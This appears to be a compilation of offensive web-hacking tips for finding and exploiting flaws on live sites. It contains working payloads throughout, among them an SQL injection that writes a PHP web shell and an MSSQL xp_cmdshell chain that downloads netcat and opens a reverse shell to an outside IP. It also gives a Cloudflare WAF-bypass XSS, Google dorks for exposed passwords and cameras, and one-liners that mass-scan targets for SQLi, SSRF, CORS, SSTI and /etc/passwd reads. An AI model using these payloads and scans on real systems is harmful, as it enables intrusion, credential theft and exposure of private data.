Forgotten database dumps
Old database dumps can contain all sorts of interesting information - user credentials, configuration settings, API secrets and keys, customer data, and more.
Here is a short but effective checklist to quickly check for forgotten database dumps.
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
/setup.sql
/sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
dork:
intitle:"index of" "back.sql" OR "backup.sql" OR "accounts.sql" OR "backups.sql" OR "clients.sql" OR "customers.sql" OR "data.sql" OR "database.sql" OR "database.sqlite" OR "users.sql" OR "db.sql" OR "db.sqlite" OR "db_backup.sql" OR "dbase.sql" OR "dbdump.sql" OR "setup.sql" OR "sqldump.sql" OR "dump.sql" OR "mysql.sql" OR "sql.sql" OR "temp.sql"
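Beyond dorking, the checklist above can be probed directly. A minimal sketch, assuming curl is available and using example.com as a placeholder target (trimmed to three of the paths above):

```shell
# Placeholder target; substitute a host you are authorized to test.
TARGET="https://example.com"

# A few candidate dump paths from the checklist above.
cat > dump-paths.txt <<'EOF'
/backup.sql
/db.sql
/dump.sql
EOF

# Probe each path; report anything that answers 200 OK.
while read -r path; do
  code=$(curl -m 5 -s -o /dev/null -w '%{http_code}' "$TARGET$path")
  if [ "$code" = "200" ]; then
    echo "FOUND: $TARGET$path"
  fi
done < dump-paths.txt
```

A 200 alone is not proof: some servers answer 200 with an error page, so verify the body actually looks like SQL before celebrating.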
Transition from SQL injection to shell or backdoor
▪️ Use INTO OUTFILE to write a file:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
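For context, the file that payload writes is a one-line PHP web shell; reproduced locally (nothing here touches a server):

```shell
# The exact contents the INTO OUTFILE payload drops at /var/www/dvwa/cmd.php:
printf '<?php system($_GET["cmd"]); ?>\n' > cmd.php
cat cmd.php
```

Once written, requesting cmd.php?cmd=id on the target executes the command. Note that the MySQL account needs the FILE privilege and secure_file_priv must permit writing to that directory.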
▪️ Capture the request in Burp Proxy, save it to the file post-request, then run sqlmap:
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
▪️ Reverse netcat shell via MSSQL injection when xp_cmdshell is available:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#web #sqli
Getting other vulnerabilities when uploading a file
When testing file upload functionality in a web application, try setting the file name to the following values:
▪️ ../../../tmp/lol.png -> for Path Traversal vulnerability
▪️ sleep(10)-- -.jpg -> for SQL injection
▪️ <svg onload=alert(document.domain)>.jpg/png -> for XSS
▪️ ; sleep 10; -> for command injection
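The filenames above can be supplied straight from curl. A sketch, assuming a hypothetical /upload endpoint and a form field named file (adjust both to the app under test):

```shell
# Filenames worth trying in the upload's filename field (from the list above).
cat > upload-filenames.txt <<'EOF'
../../../tmp/lol.png
sleep(10)-- -.jpg
<svg onload=alert(document.domain)>.jpg
; sleep 10;
EOF

# Hypothetical request shape; the endpoint and field name are assumptions:
# curl -s -X POST "https://target.example/upload" \
#      -F 'file=@lol.png;filename=../../../tmp/lol.png'

wc -l < upload-filenames.txt
```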
These payloads may introduce additional vulnerabilities.
#web
A small selection of interesting Google dorks
▪️ FTP servers and sites:
intitle:"index of" inurl:ftp after:2018
▪️ Log files with passwords:
allintext:password filetype:log after:2018
▪️ Configuration files with passwords:
filetype:env "DB_PASSWORD" after:2018
▪️ Lists of email addresses:
filetype:xls inurl:"email.xls"
▪️ Open cameras:
inurl:top.htm inurl:currenttime
#web #google
After exploiting SQL injection using the following email address:
"'-sleep(5)-'"@mail.local
you can't help but wonder: why the hell did this even get through as a valid email?
In general, according to the RFC, the local part of an email (the login, before the @) can contain special characters if it is enclosed in double quotes. Beyond that, our beloved programming languages deviate a little in which characters they actually accept.
So, a bit of magic:
php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);"
It will validate and legally return an email with the attack vector:
"'--><script/src=//evil.com></script>"@example.com
And how the developers display it further is a separate question.
#sqli
Bypass Cloudflare WAF
Payloads working at the time of publication for performing XSS on sites protected by Cloudflare WAF.
<img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'>
#web #xss
Hacking with an image. PHP payload in an image.
The php-jpeg-injector tool can be used to attack web applications that run a .jpeg image through the PHP GD graphics library.
The tool creates a new .jpeg file carrying a PHP payload that survives processing by PHP's GD library; when the processed image is later passed through PHP, the injected payload is interpreted and executed.
#web
GitHub Link
Find SQL injection on the site with one command
As always, a chain of tools does the job.
findomain collects the subdomains of the site being tested.
httpx checks which of them are alive.
anew deduplicates the live hosts before they are passed on.
waybackurls retrieves every URL the Wayback Machine knows about for the live subdomains.
gf then filters for URLs matching patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, sqlmap is run against all identified potentially vulnerable URLs.
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent
#web #sqli
Search for SSRF on a site with one command
To accomplish this task, we will use several utilities.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Getallurls (gau) extracts known URLs from the AlienVault Open Threat Exchange, Wayback Machine, and Common Crawl.
qsreplace takes URLs as input and replaces all query-string values with a value specified by the user.
After installing the above tools, simply run the following command:
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace your.burpcollaborator.net
Replace your.burpcollaborator.net with your own server (or Burp Collaborator) address.
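If qsreplace is not installed, the substitution step can be approximated with sed (a rough sketch; unlike qsreplace it is not URL-aware, so treat it as an illustration only):

```shell
# Replace every query-string value with a collaborator host, qsreplace-style.
echo 'https://sub.example.com/page?id=123&next=/home' \
  | sed -E 's/=[^=&]+/=your.burpcollaborator.net/g'
# -> https://sub.example.com/page?id=your.burpcollaborator.net&next=your.burpcollaborator.net
```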
#web #ssrf
Find hidden parameters for IDOR search
When you encounter the following endpoints, try to look for hidden parameters as there is a high probability of encountering IDOR (Insecure Direct Object Reference):
/settings/profile
/user/profile
/user/settings
/account/settings
/username
/profile
To find hidden parameters you can use Arjun or fuzzparam:
https://github.com/0xsapra/fuzzparam
https://github.com/s0md3v/Arjun
Burp Suite has the Param Miner extension for this purpose.
https://github.com/PortSwigger/param-miner
#web #idor
Finding web servers vulnerable to CORS attacks
The following one-liner can determine if any subdomain of the target domain is vulnerable to cross-origin resource sharing (CORS) attacks:
assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] \033[0m{}"' 2>/dev/null
For this combination to work, please install the following tools:
https://github.com/tomnomnom/assetfinder
https://github.com/projectdiscovery/httpx
https://github.com/shenwei356/rush
Here's what the command does in detail:
It collects subdomains of the target domain (e.g. fitbit.com), identifies the live ones and builds a list of URLs, requests each URL with an Origin: evil.com HTTP header, looks for "evil.com" in the response headers, and prints any match to the terminal.
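What the grep inside the one-liner actually matches can be shown without any network: a vulnerable server reflects the attacker-supplied Origin back in its response headers. A simulated vulnerable response:

```shell
# A response that reflects the Origin header back; grep counts the matching line.
printf 'HTTP/1.1 200 OK\r\nAccess-Control-Allow-Origin: evil.com\r\nAccess-Control-Allow-Credentials: true\r\n' \
  | grep -c 'evil.com'
# -> 1 (the one-liner flags the host when this count is greater than 0)
```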
If the command flags hosts as [VUL TO CORS], the sites in question have misconfigured their CORS policy and could potentially expose sensitive information to any arbitrary third-party website. This information includes cookies, API keys, CSRF tokens, and other sensitive data.
For more information about CORS attacks, check out PortSwigger's CORS security guide :
https://portswigger.net/web-security/cors
#web #cors
Automate the search for Server-side Template Injection (SSTI)
First, save these payloads to a file payloads.txt (you can add your own):
check-ssti{{7*7}}[[1*1]]
check-ssti{{7*7}}
check-ssti{{7*'7'}}
check-ssti<%= 7 * 7 %>
check-ssti${7*7}
check-ssti${{7*7}}
check-ssti@(7*7)
check-ssti#{7*7}
check-ssti#{ 7 * 7 }
Then, using waybackurls we get the endpoints of our site and select the most suitable ones for SSTI using gf:
echo target.com | waybackurls | gf ssti | anew -q ssti.txt
Create a list of endpoints with the payload as a parameter:
cat payloads.txt | while read -r line; do cat ssti.txt | qsreplace "$line" | anew -q sstipatterns.txt; done
Finally, run this command to check the server's responses for evaluated payloads (an engine that computes 7*7 will reflect check-ssti49):
cat sstipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"check-ssti49\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"
#web #ssti
XSS in applications with automatic error correction
If you see that a web application is trying to guess or fix your search query (e.g. in the search bar) and has a WAF on top of it, use misspelled words to perform XSS and bypass the WAF:
<scrpt>confrm()</scrpt>
Will be corrected to:
<script>confirm()</script>
The above behavior is often observed in PHP web applications using pspell_suggest().
#web #xss #waf
Quick website check for simple LFI
Find a wordlist of payloads that read /etc/passwd and save it to the payloads.txt file.
Then, using waybackurls we get the endpoints of our site and select the most suitable ones for LFI using gf:
echo target.com | waybackurls | gf lfi | anew -q lfi.txt
Create a list of endpoints with the payload as a parameter using qsreplace:
cat payloads.txt | while read -r line; do cat lfi.txt | qsreplace "$line" | anew -q lfipatterns.txt; done
We run the command to check the server's response for LFI:
cat lfipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"root:\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"
#web #lfi